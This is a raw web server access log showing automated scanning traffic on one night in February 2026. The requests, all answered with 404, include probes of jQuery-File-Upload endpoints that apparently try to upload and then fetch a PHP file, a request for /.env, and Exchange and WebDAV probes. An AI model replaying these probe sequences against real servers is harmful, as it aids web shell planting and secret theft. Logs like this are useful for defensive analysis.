103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /example/upload.php/files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "POST /jQuery-File-Upload/server/php/index.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /server/php/UploadHandler.php/files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "POST /jquery-file-upload/server/php/index.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "POST /example/upload.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
103.144.87.192 - - [13/Feb/2026:01:41:32 +0000] "POST /php/index.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14"
103.144.87.192 - - [13/Feb/2026:01:41:32 +0000] "GET /files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:01:41:32 +0000] "GET /php/index.php/files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
103.144.87.192 - - [13/Feb/2026:01:41:32 +0000] "GET /files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_7_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
91.205.185.100 - - [13/Feb/2026:01:50:54 +0000] "GET /aaaaaw HTTP/1.1" 404 1236 "-" "-"
172.202.117.213 - - [13/Feb/2026:02:00:37 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
87.120.191.67 - - [13/Feb/2026:02:47:07 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
78.153.140.250 - - [13/Feb/2026:02:53:23 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [13/Feb/2026:02:53:24 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
185.247.137.231 - - [13/Feb/2026:03:14:06 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
176.65.134.20 - - [13/Feb/2026:03:26:26 +0000] "PROPFIND / HTTP/1.1" 404 1236 "http://150.230.34.123:443/" "-"
34.78.138.227 - - [13/Feb/2026:03:27:29 +0000] "GET / HTTP/1.1" 404 705 "-" "python-requests/2.32.5"
